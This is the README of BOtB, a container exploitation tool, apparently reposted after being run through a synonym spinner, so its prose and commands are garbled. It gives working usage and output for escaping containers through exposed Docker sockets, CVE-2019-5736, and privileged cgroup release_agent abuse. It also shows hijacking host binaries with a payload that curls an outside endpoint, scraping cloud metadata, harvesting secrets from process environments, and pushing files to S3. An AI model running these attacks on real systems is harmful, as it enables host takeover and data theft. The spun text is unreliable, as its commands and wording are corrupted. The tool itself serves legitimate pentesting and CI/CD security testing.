Botb – A Container Research And Exploitation Software For Pentesters And Engineers

BOtB is a container evaluation and exploitation instrument designed for use via pentesters and engineers whilst additionally being CI/CD pleasant with commonplace CI/CD applied sciences.

What does it do?
BOtB is a CLI instrument which lets you:

  • Exploit commonplace container vulnerabilities
  • Carry out commonplace container submit exploitation movements
  • Supply capacity when sure gear or binaries don’t seem to be to be had within the Container
  • Use BOtB’s functions with CI/CD applied sciences to check container deployments
  • Carry out the above in both a handbook or computerized way

endpoints i.e http://169.254.169.254

  • Carry out a container breakout through uncovered Docker daemons
  • Carry out a container breakout through CVE-2019-5736
  • Hijack host binaries with a customized payload
  • Carry out movements in CI/CD mode and best go back go out codes > 0
  • Scrape metadata data from GCP metadata endpoints
  • Push records to an S3 bucket
  • Get away of Privileged Boxes
  • Power BOtB to constantly go back a Go out Code of 0 (helpful for non-blocking CI/CD)
  • Getting BOtB
    BOtB is to be had as a binary within the Releases Phase.

    Construction BOtB
    BOtB is written in GO and may also be constructed the use of the usual GO gear. The next may also be finished to get you began:
    Getting the Code:

    move get github.com/brompwnie/botb
    or
    git clone [email protected]:brompwnie/botb.git

    Construction the Code:

    govendor init
    govendor upload github.com/television42/httpunix
    govendor upload github.com/kr/pty
    move construct -o botbsBinary

    Utilization
    BOtB may also be compiled right into a binary for the centered platform and helps the next utilization

    Utilization of ./botb:
    -aggr string
    Try to exploit RuncPWN (default "nil")
    -always-succeed
    Try to scrape the GCP metadata provider
    -autopwn
    Try to autopwn uncovered sockets
    -cicd
    Try to autopwn however do not drop to TTY,go back go out code 1 if a hit else 0
    -endpointlist string
    Supply a wordlist (default "nil")
    -find-docker
    Try to discover Dockerd
    -find-http
    Hunt for To be had UNIX Area Sockets with HTTP
    -hijack string
    Try to hijack binaries on host (default "nil")
    -interfaces
    Show to be had community interfaces
    -metadata
    Try to discover metadata services and products
    -path string
    Trail to Get started Scanning for UNIX Area Sockets (default "/")
    -pwn-privileged string
    Supply a command payload to take a look at exploit --privilege CGROUP release_agent's (default "nil")
    -recon
    Carry out Recon of the C ontainer ENV
    -region string
    Supply a AWS Area e.g eu-west-2 (default "nil")
    -s3bucket string
    Supply a bucket identify for S3 Push (default "nil")
    -s3push string
    Push a document to S3 e.g Complete command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME can be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
    -scrape-gcp
    Try to scrape the GCP metadata provider
    -socket
    Hunt for To be had UNIX Area Sockets
    -verbose
    Verbose output
    -wordlist string
    Supply a wordlist (default "nil")

    The next utilization examples will go back a Go out Code > 0 via default when an anomaly is detected, that is depicted via “echo $?” which presentations the go out code of the remaining achieved command.

    To find UNIX Area Sockets

    #./bob_linux_amd64 -socket=true
    [+] Spoil Out The Field
    [+] Looking Down UNIX Area Sockets from: /
    [!] Legitimate Socket: /var/meh
    [+] Completed

    #echo $?
    1

    Discover a Docker Daemon

    #./bob_linux_amd64 -find-docker=true
    [+] Spoil Out The Field
    [+] In search of Dockerd
    [!] Dockerd DOCKER_HOST discovered: tcp://0.0.0.0:2375
    [+] Looking Docker Socks
    [!] Legitimate Docker Socket: /var/meh
    [+] Completed

    #echo $?
    1

    Get away from Container through Uncovered Docker Daemon
    This way will breakout into an interactive TTY at the host.

    #./bob_linux_amd64 -autopwn=true    
    [+] Spoil Out The Field
    [+] Making an attempt to autopwn
    [+] Looking Docker Socks
    [+] Making an attempt to autopwn: /var/meh
    [+] Making an attempt to flee to host...
    [+] Making an attempt in TTY Mode
    ./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:newest /bin/sh
    chroot /host && transparent
    echo 'You at the moment are at the underlying host'
    You at the moment are at the underlying host
    / #

    Get away of a Container however in a CI/CD Pleasant method
    This way does now not break out right into a TTY at the host however as a substitute returns an Go out Code > 0 to signify a a hit container breakout.

    #./bob_linux_amd64 -autopwn=true -cicd=true
    [+] Spoil Out The Field
    [+] Making an attempt to autopwn
    [+] Looking Docker Socks
    [+] Making an attempt to autopwn: /var/meh
    [+] Making an attempt to flee to host...
    [!] Effectively escaped container
    [+] Completed

    #echo $?
    1

    Exploit CVE-2019-5736 with a Customized Payload
    Please notice that for this exploit to paintings, a procedure must be achieved within the goal container on this state of affairs.

    #./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0¶m1=$1¶m2=$2">/dev/null 2>&1'
    [+] Spoil Out The Field[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
    [+] Making an attempt to take advantage of CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0¶m1=$
    1¶m2=$2">/dev/null 2>&1
    [+] This procedure will go out IF an EXECVE is named within the Container or if the Container is manually stopped
    [+] Completed

    Hijack Instructions/Binaries on a Host with a Customized Payload
    Please notice that this can be utilized to check if exterior entities are executing instructions throughout the container. Examples are Docker Exec and Kubetcl CP.

    #./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0¶m1=$
    1¶m2=$2">/dev/null 2>&1'
    [+] Spoil Out The Field
    [!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
    [+] Making an attempt to hijack binaries
    [*] Command for use: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0¶m1=$1¶m2=$2">/dev/null 2>&1
    [+] Recently hijacking: /bin
    [+] Recently hijacking: /sbin
    [+] Recently hijacking: /usr/bin
    [+] Completed

    Analyze ENV and ProcFS Environ for Delicate Strings
    Via default BOtB will seek for the two phrases “secret” and “password”.

     ./bob_linux_amd64 -recon=true
    [+] Spoil Out The Field
    [+] Appearing Container Recon
    [+] Looking /proc/* for records
    [!] Delicate key phrase present in: /proc/1/environ -> 'PATH=/move/bin:/usr/native/move/bin:/usr/native/sbin:/usr/native/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
    [!] Delicate key phrase present in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/move/bin:/usr/native/move/bin:/usr/native/sbin:/usr/native/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
    [!] Delicate key phrase present in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/move/bin:/usr/native/move/bin:/usr/native/sbin:/usr/native/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
    [!] Delicate key phrase discovered in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/move/bin:/usr/native/move/bin:/usr/native/sbin:/usr/native/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
    [+] Checking ENV Variables for secrets and techniques
    [!] Delicate Key phrase present in ENV: foo=secretpassword
    [+] Completed

    #echo $?
    1

    A wordlist may also be provided to BOtB to scan for explicit key phrases.

    #cat wordlist.txt 
    moo

    # ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
    [+] Spoil Out The Field
    [+] Appearing Container Recon
    [+] Looking /proc/* for records
    [*] Loading entries from: wordlist.txt
    [+] Checking ENV Variables for secrets and techniques
    [*] Loading entries from: wordlist.txt
    [+] Completed

    # echo $?
    0

    Scan for Metadata Endpoints
    BOtB via default scans for two Metadata endpoints.

    #  ./bob_linux_amd64 -metadata=true                    
    [+] Spoil Out The Field
    [*] Making an attempt to question metadata endpoint: 'http://169.254.169.254/newest/meta-data/'
    [*] Making an attempt to question metadata endpoint: 'http://kubernetes.default.svc/'
    [+] Completed

    # echo $?
    0

    BOtB may also be provided with an inventory of endpoints to scan for.

    #  cat endpoints.txt 
    https://heroku.com

    # ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
    [+] Spoil Out The Field
    [*] Loading entries from: endpoints.txt
    [*] Making an attempt to question metadata endpoint: 'https://heroku.com'
    [!] Reponse from 'https://heroku.com' -> 200
    [+] Completed

    # echo $?
    1

    Get Interfaces and IP’s

    #  ./bob_linux_amd64 -interfaces=true
    [+] Spoil Out The Field
    [+] Making an attempt to get native community interfaces
    [*] Were given Interface: lo
    [*] Were given deal with: 127.0.0.1/8
    [*] Were given Interface: tunl0
    [*] Were given Interface: ip6tnl0
    [*] Were given Interface: eth0
    [*] Were given deal with: 172.17.0.3/16
    [+] Completed

    Scan for UNIX Area Sockets that reply to HTTP

    #  ./bob_linux_amd64 -find-http=true
    [+] Spoil Out The Field
    [+] In search of HTTP enabled Sockets
    [!] Legitimate HTTP Socket: /var/run/docker.sock
    [+] Completed

    Scrape records from GCP metadata example

    #  ./botb_linux_amd64 -scrape-gcp=true
    [+] Spoil Out The Field
    [+] Making an attempt to connect with: 169.254.169.254:80

    [*] Output->
    HTTP/1.0 200 OK
    Metadata-Taste: Google
    Content material-Sort: application/textual content
    Date: Solar, 30 Jun 2019 21:53:41 GMT
    Server: Metadata Server for VM
    Connection: Shut
    Content material-Period: 21013
    X-XSS-Coverage: 0
    X-Body-Choices: SAMEORIGIN

    0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
    0.1/meta-data/attached-disks/disks/0/index 0
    0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
    .....

    Push records to an AWS S3 Bucket

    #  ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
    [+] Spoil Out The Field
    [+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
    [*] Knowledge uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
    [+] Completed

    Get away of a Privileged Container

    #  ./bob_linux_amd64 -pwn-privileged=hostname
    [+] Spoil Out The Field
    [+] Making an attempt to take advantage of CGROUP Privileges
    [*] The results of your command may also be present in /output
    [+] Completed
    [email protected]:/app# cat /output
    docker-desktop

    Power BOtB to constantly prevail with a Go out Code of 0
    This turns out to be useful for non-blocking CI/CD checks

    #  ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed-true
    [+] Spoil Out The Field
    [+] Making an attempt to take advantage of CGROUP Privileges
    [*] The results of your command may also be present in /output
    [+] Completed
    # echo $?
    0

    The usage of BOtB with CICD
    BOtB can be utilized with CICD applied sciences that employ go out codes to resolve if checks have handed or failed. Under is a Shell script that executes two BOtB checks and the go out codes of the two checks are used to set the go out of the Shell script. If any of the two checks go back an Go out Code >0, the check executing the shell script will fail.

    #!/bin/sh 

    exitCode=0

    echo "[+] Trying out UNIX Sockets"
    ./bob_linux_amd64 -autopwn -cicd=true
    exitCode=$?

    echo "[+] Trying out Env"
    ./bob_linux_amd64 -recon=true
    exitCode=$?

    (go out $exitCode)

    The above script isn’t the one method to make use of BOtB with CICD applied sciences however is also used on its own and now not wrapped in a shell script. An instance YML config can be:

    model: 2
    cicd:
    runATest: ./bob_linux_amd64 -autopwn -cicd=true

    Under is an instance config that can be utilized with Heroku CI:

    {
    "environments":
    "check":

    }

    Under is an instance config with Heroku CI however the use of a wrapper shell script:

    {
    "environments":
    "check":

    }

    Problems, Insects and Enhancements
    For any insects, please publish a topic. There’s a lengthy checklist of enhancements however please publish an Factor if there’s something you wish to have to peer added to BOtB.

    References and Assets
    This instrument would now not be imaginable with out the contribution of others locally, beneath is an inventory of assets that experience helped me.

    • https://doctors.docker.com/engine/safety/https/
    • https://kubernetes.io/doctors/reference/generated/kubectl/kubectl-commands#cp
    • https://doctors.docker.com/engine/reference/commandline/exec/
    • https://github.com/GoogleContainerTools/container-structure-test
    • https://github.com/coreos/clair
    • https://github.com/aquasecurity/docker-bench
    • https://www.cisecurity.org/benchmark/docker/
    • https://github.com/Frichetten/CVE-2019-5736-PoC
    • https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
    • https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/
    • https://doctors.aws.amazon.com/AWSEC2/newest/UserGuide/ec2-classic-platform.html
    • https://github.com/wagoodman/dive
    • https://github.com/cji/talks/blob/grasp/BruCON2018/Outdoor%20The%20Field%20-%20BruCON%202018.pdf
    • https://github.com/singe/container-breakouts
    • https://weblog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

    Talks and Occasions
    BOtB is scheduled to be offered on the following:

    • BSides London 2019 (https://sched.co/PAwB) and slides may also be discovered right here https://github.com/brompwnie/bsideslondon2019
    • Blackhat Las Vegas Arsenal 2019 (https://www.blackhat.com/us-19/arsenal/agenda/index.html#break-out-the-box-botb-container-analysis-exploitation-and-cicd-tool-14988)
    • DefCon 27 Cloud Village (https://cloud-village.org/)
    Obtain Botb